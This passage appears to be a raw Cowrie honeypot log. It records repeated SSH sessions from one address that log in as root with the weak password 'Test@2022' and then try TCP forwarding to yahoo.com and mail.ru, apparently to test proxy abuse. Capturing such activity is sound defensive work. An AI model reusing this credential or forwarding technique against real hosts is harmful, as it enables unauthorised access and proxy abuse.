{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":11230,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11230","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.648582Z","session":"f0f4a23d4683"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.698733Z","src_ip":"77.83.207.83","session":"f0f4a23d4683"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.749561Z","src_ip":"77.83.207.83","session":"f0f4a23d4683"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1721,"dst_ip":"1.2.3.4","dst_port":22,"session":"14986c7a60b8","protocol":"ssh","message":"New connection: 77.83.207.83:1721 (1.2.3.4:22) [session: 14986c7a60b8]","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.798220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.799527Z","src_ip":"77.83.207.83","session":"14986c7a60b8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.849185Z","src_ip":"77.83.207.83","session":"14986c7a60b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.098234Z","src_ip":"77.83.207.83","session":"14986c7a60b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2182,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2182","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.149409Z","session":"14986c7a60b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.199345Z","src_ip":"77.83.207.83","session":"14986c7a60b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":17704,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17704","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.340216Z","session":"14986c7a60b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.390551Z","src_ip":"77.83.207.83","session":"14986c7a60b8"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.457593Z","src_ip":"212.227.125.160","session":"ef8bd078a237"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":27574,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27574","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.532121Z","session":"14986c7a60b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.581983Z","src_ip":"77.83.207.83","session":"14986c7a60b8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.632688Z","src_ip":"77.83.207.83","session":"14986c7a60b8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1796,"dst_ip":"1.2.3.4","dst_port":22,"session":"f124fca5f6d4","protocol":"ssh","message":"New connection: 77.83.207.83:1796 (1.2.3.4:22) [session: f124fca5f6d4]","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.682133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.682987Z","src_ip":"77.83.207.83","session":"f124fca5f6d4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.732985Z","src_ip":"77.83.207.83","session":"f124fca5f6d4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:12.983820Z","src_ip":"77.83.207.83","session":"f124fca5f6d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":19177,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:19177","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.034727Z","session":"f124fca5f6d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.084857Z","src_ip":"77.83.207.83","session":"f124fca5f6d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":26138,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26138","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.228390Z","session":"f124fca5f6d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.278579Z","src_ip":"77.83.207.83","session":"f124fca5f6d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":12506,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12506","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.420414Z","session":"f124fca5f6d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.470741Z","src_ip":"77.83.207.83","session":"f124fca5f6d4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.521532Z","src_ip":"77.83.207.83","session":"f124fca5f6d4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1895,"dst_ip":"1.2.3.4","dst_port":22,"session":"e56ec0931f37","protocol":"ssh","message":"New connection: 77.83.207.83:1895 (1.2.3.4:22) [session: e56ec0931f37]","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.570001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.570775Z","src_ip":"77.83.207.83","session":"e56ec0931f37"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.620721Z","src_ip":"77.83.207.83","session":"e56ec0931f37"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.868880Z","src_ip":"77.83.207.83","session":"e56ec0931f37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23635,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23635","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.919623Z","session":"e56ec0931f37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:13.969800Z","src_ip":"77.83.207.83","session":"e56ec0931f37"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.111881Z","src_ip":"212.227.235.229","session":"bd5f49b6856c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.112650Z","src_ip":"212.227.235.229","session":"bd5f49b6856c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":27839,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27839","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.114488Z","session":"e56ec0931f37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.164343Z","src_ip":"77.83.207.83","session":"e56ec0931f37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":16240,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16240","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.304075Z","session":"e56ec0931f37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.353924Z","src_ip":"77.83.207.83","session":"e56ec0931f37"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.404811Z","src_ip":"77.83.207.83","session":"e56ec0931f37"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1998,"dst_ip":"1.2.3.4","dst_port":22,"session":"140d5ea7bff6","protocol":"ssh","message":"New connection: 77.83.207.83:1998 (1.2.3.4:22) [session: 140d5ea7bff6]","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.454579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.455897Z","src_ip":"77.83.207.83","session":"140d5ea7bff6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.506503Z","src_ip":"77.83.207.83","session":"140d5ea7bff6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.757254Z","src_ip":"77.83.207.83","session":"140d5ea7bff6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11838,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11838","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.808480Z","session":"140d5ea7bff6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:14.858924Z","src_ip":"77.83.207.83","session":"140d5ea7bff6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":9057,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9057","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.000879Z","session":"140d5ea7bff6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.051426Z","src_ip":"77.83.207.83","session":"140d5ea7bff6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":18673,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18673","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.192651Z","session":"140d5ea7bff6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.243623Z","src_ip":"77.83.207.83","session":"140d5ea7bff6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.294738Z","src_ip":"77.83.207.83","session":"140d5ea7bff6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2073,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1a598b0da4e","protocol":"ssh","message":"New connection: 77.83.207.83:2073 (1.2.3.4:22) [session: f1a598b0da4e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.343565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:15.353895Z","src_ip":"77.83.207.83","session":"f1a598b0da4e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ri